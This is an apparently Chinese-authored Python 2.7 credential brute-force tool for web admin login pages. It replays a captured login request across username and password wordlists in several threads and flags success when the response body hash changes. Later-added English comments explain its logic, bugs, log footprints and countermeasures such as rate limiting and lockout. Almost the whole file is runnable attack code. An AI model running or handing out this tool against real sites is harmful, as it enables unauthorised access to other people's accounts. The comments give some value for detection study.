python版通用后台账号密码多线程爆破必杀器

#! /usr/bin/env python2.7
#coding=utf-8
#通用后台账号密码多线程爆破必杀器


import re
import os
import sys
import gzip
import Queue
import getopt
import msvcrt
import urllib
import httplib
import hashlib
import urllib2
import StringIO
import threading


# Worker thread. Each instance pulls ready-made POST bodies from the
# module-level `queue` (created in crack()) and replays them against the
# login endpoint described by headers.txt.
class hackcrack(threading.Thread):
    # ooldmd5: MD5 hex digest of the baseline response produced by testcrack().
    # uuu / ppp: names of the username / password form fields in the POST body.
    def __init__(self,ooldmd5,uuu,ppp):
        threading.Thread.__init__(self)
        self.ooldmd5 = ooldmd5
        self.uuu = uuu
        self.ppp = ppp
    # Keep sending queued candidates until the shared queue reports empty.
    def run(self):
        while 1:
            if queue.empty() == True:
                break
            self.crack(self.ooldmd5,self.uuu,self.ppp)
    # Send one queued POST body and compare the response with the baseline.
    #
    # Detection note: the request goes over plain HTTP (httplib.HTTPConnection)
    # and every attempt reuses the same path and header set read from
    # headers.txt (the list in headers() includes Cookie, User-Agent and
    # Referer); only the two credential fields in the body change. In server
    # or proxy logs this appears as a burst of POSTs to one path that share
    # those header values.
    # Mitigation note: nothing here refreshes a token or reacts to throttling,
    # so per-request anti-CSRF tokens, attempt rate limiting and account
    # lockout are the controls this replay does not account for
    # (presumably effective against it; verify on the application).
    def crack(self,ooldmd5,uuu,ppp):
        data = queue.get()
        # path(), headers() and host() each re-open and re-parse headers.txt,
        # so the file is read three times per attempt.
        pathes = path()
        headerses = headers()
        arg = host()
        # Pull the candidate values back out of the body, for display only.
        # The field names are interpolated into the pattern unescaped, and the
        # pattern requires a trailing '&' after the value.
        m = re.compile('%s=(.*?)&' % uuu)
        n = re.compile('%s=(.*?)&' % ppp)     
        us = m.findall(data)
        pw = n.findall(data)   
        conn = httplib.HTTPConnection(arg)
        try:
            conn.request('POST',pathes,data,headerses)
            httpres = conn.getresponse()
            
            # Decompress only when the response carries exactly this
            # (name, value) header pair; any other encoding is read raw.
            if ('content-encoding', 'gzip') in httpres.getheaders():
                compressedstream = StringIO.StringIO(httpres.read())  
                gzipper = gzip.GzipFile(fileobj=compressedstream)     
                ccode = gzipper.read()
            else:
                ccode = httpres.read()
            # MD5 is used purely as a body fingerprint; an empty body is
            # fingerprinted as the fixed string 'mdbhack'.
            if ccode:
                newmd5 = hashlib.md5(ccode).hexdigest()
            else:
                newmd5 = hashlib.md5('mdbhack').hexdigest()
            # The only success signal is "body differs from the baseline".
            # Any response that differs for another reason (error page,
            # per-response token, timestamp) is reported the same way.
            if ooldmd5 != newmd5:
                print '\n http://%s' % arg
                print ' http://%s%s' % (arg,pathes)
                print ' I Find It -------->username:%s password:%s<--------' % (us[0],pw[0])
                print ccode
                # os._exit terminates the whole process immediately,
                # including the other worker threads.
                os._exit(1)
            else:
                print '[%s] hacking -------->username:%s password:%s' % (queue.qsize(),us[0],pw[0])
                #print ccode
        # Bare except: network errors, decode errors and IndexError from
        # us[0]/pw[0] are all discarded silently; the dequeued candidate is
        # not retried.
        except:
            pass        

# Keyboard watcher thread: lets the operator abort the run with 'q'.
# msvcrt is a Windows-only module, so the script as written runs only there.
class ThreadGetKey(threading.Thread):
    def run(self):
        try:           
            # getch() blocks for a single keypress. Only one key is read per
            # thread; any key other than 'q' simply ends this thread.
            chr = msvcrt.getch()
            if chr == 'q':
                print "stopped by your action ( q )"
                os._exit(1)
        # Any failure while reading the key also terminates the process.
        except:
            os._exit(1)



# Print the ASCII banner and the usage line. -u and -p take the *names* of
# the username and password form fields (see the __main__ block), not values.
def info():
    print '''
     ,--^----------,--------,-----,-------^--,
     | |||||||||   `--------'     |          O ..
     `+---------------------------^----------|
       `\_,-------, ___@ mdbhack#QQ.com______|
         / XXXXXX /`|     /
        / XXXXXX /  `\   /
       / XXXXXX /\______(
      / XXXXXX /        
     / XXXXXX /
    (________(    For example:
     `------'         crack.py -u username -p password
    
    '''


# Return the request path from headers.txt: the second space-separated token
# of the first line containing 'POST'. Falls through and returns None when no
# such line exists. The file handle is never closed explicitly.
def path():
    f = open('headers.txt','r')
    for p in f:
        if 'POST' in p:
            path = p.split(' ')[1].strip()
            #print path
            return path
# Build the header dict that is replayed with every request, from the lines
# of headers.txt that mention one of the names in hheader.
#
# Matching is a substring test against the whole line, so a line such as
# 'Accept-Language: ...' also satisfies the 'Accept' entry and overwrites
# headers['Accept'] with its value. Detection note: if the capture lists
# Accept-Language / Accept-Encoding after Accept, the replayed Accept header
# would carry a language or encoding list, which is an unusual value a
# defender can match on (depends on the capture's line order; verify).
# The file handle is never closed explicitly.
def headers():
    headers = {}
    hheader = ['Host','User-Agent','Accept','Accept-Language','Accept-Encoding','Referer','Cookie','Connection','Content-Type']
    f = open('headers.txt','r')
    for p in f:
        for hh in hheader:
            if hh in p:
                # Value is everything after the first ':' on the line.
                headers[hh] = p.split(':',1)[1].strip()    
    return headers
# Return the target host from headers.txt: the text between the first and
# second ':' of the last line containing 'Host'. Because only element [1] of
# the split is kept, an explicit ':port' suffix is dropped. If no line
# contains 'Host', `arg` is never bound and the return raises
# UnboundLocalError. The file handle is never closed explicitly.
def host():
    f = open('headers.txt','r')
    for p in f:
        if 'Host' in p:
            arg = p.split(':')[1].strip()
    #print arg
    return arg

# Establish the baseline: send the captured POST body once with fixed
# placeholder credentials and return the MD5 hex digest of the response body.
# username / password are the form-field names, not credential values.
# Every later response is compared against this digest in hackcrack.crack().
def testcrack(username,password):
    pathes = path()
    arg = host()
    headerses = headers()
    
    # getusername / getpassword are assigned but never used below.
    getusername = username
    getpassword = password
    f = open('headers.txt','r')
    # The POST body is taken to be the last line containing both '&' and '='.
    # If no line matches, getdata is unbound and the substitution below raises.
    for xxx in f:
        if '&' in xxx and '=' in xxx:
            getdata = xxx.strip()  
    # Field names are placed into the regex unescaped, and the pattern needs a
    # trailing '&', so a field that is last in the body is not rewritten.
    getpw = re.compile('%s=(.*?)&' % password)
    getusern = re.compile('%s=(.*?)&' % username)    
    bb = getpw.sub('%s=%s&' % (password,'mdbhackcom'),getdata)
    data = getusern.sub('%s=%s&' % (username,'mdbhack'),bb)
    # Plain HTTP; no error handling here, so a connection failure propagates.
    conn = httplib.HTTPConnection(arg)
    conn.request('POST',pathes,data,headerses)
    httpres = conn.getresponse()
    if ('content-encoding', 'gzip') in httpres.getheaders():
        compressedstream = StringIO.StringIO(httpres.read())  
        gzipper = gzip.GzipFile(fileobj=compressedstream)     
        code = gzipper.read()
    else:
        code = httpres.read()
    # MD5 serves as a content fingerprint only; an empty body is fingerprinted
    # as the fixed string 'mdbhack', matching hackcrack.crack().
    if code:
        oldmd5 = hashlib.md5(code).hexdigest()
    else:
        oldmd5 = hashlib.md5('mdbhack').hexdigest()
    
    return oldmd5
    
# Driver: build the candidate queue from username.txt x password.txt and run
# the worker threads. username / password are the form-field names.
# Publishes `queue` and `ooldmd5` as module globals for the worker class.
def crack(username,password):
    global queue,ooldmd5
    threads = []
    # Number of worker threads started per username.
    line = 5
    queue = Queue.Queue()
    # pathes, arg and headerses are computed here but not used in this function.
    pathes = path()
    arg = host()
    ooldmd5 = testcrack(username,password)
    headerses = headers()
    f = open('headers.txt','r')
    # POST body template: the last line of headers.txt containing '&' and '='.
    for xxx in f:
        if '&' in xxx and '=' in xxx:
            getdata = xxx.strip()
    for us in open('username.txt','r'):
        print ' Scan Username is %s ' % us.strip()
        # password.txt is re-opened and read in full for every username.
        for pw in open('password.txt','r'):
            getpw = re.compile('%s=(.*?)&' % password)
            getusern = re.compile('%s=(.*?)&' % username)
            # Candidate values are URL-quoted before being substituted into
            # the body template.
            bb = getpw.sub('%s=%s&' % (password.strip(),urllib2.quote(pw.strip())),getdata)
            data = getusern.sub('%s=%s&' % (username,urllib2.quote(us.strip())),bb)
            queue.put(data)



        # The statements below are still inside the per-username loop: for
        # each username a new key watcher and `line` workers are started and
        # joined before the next username is queued.
        # Detection note: the resulting traffic is grouped by account, with
        # every password candidate tried against one username before moving
        # to the next, at up to `line` requests in flight.
        shouhu = ThreadGetKey()
        shouhu.setDaemon(True)
        shouhu.start()
        
        for x in range(line):
            y = hackcrack(ooldmd5,username,password)
            y.start()
            threads.append(y)
        # `threads` is never cleared, so workers from earlier usernames are
        # joined again here (they have already finished).
        for x in threads:
            x.join()
        
        
    

# Entry point. Requires exactly four arguments (-u FIELD -p FIELD); anything
# else prints the banner and exits with status 1.
if __name__ == '__main__':
    if len(sys.argv) == 5:
        f = open('headers.txt','r')
        # POST body template: the last line of headers.txt containing '&' and '='.
        for xxx in f:
            if '&' in xxx and '=' in xxx:
                getdata = xxx.strip()        
        try:
            opts, args = getopt.getopt (sys.argv[1:], "u:p:")#Assigning Parameters
        except:
            info()
            sys.exit(1)
        for opt,arg in opts:#Traversal
            # Each field name is accepted only if it occurs as a substring of
            # the captured body; otherwise it is blanked and the run aborts.
            if opt == '-u':
                if arg.strip() in getdata:
                    username = arg.strip()
                else:
                    print '\nusername table %s is Wrong' % arg.strip()
                    username = ''
            elif opt == '-p':
                if arg.strip() in getdata:
                    password = arg.strip()
                else:
                    print 'password table %s is Wrong' % arg.strip()
                    password = ''
            else:
                info()
                sys.exit(1)
        # If one of the two options was never supplied (e.g. -u given twice),
        # the corresponding name is unbound here and this line raises NameError.
        if username and password:
            crack(username,password)
        else:
            sys.exit(1)
        
    else:
        info()
        sys.exit(1)
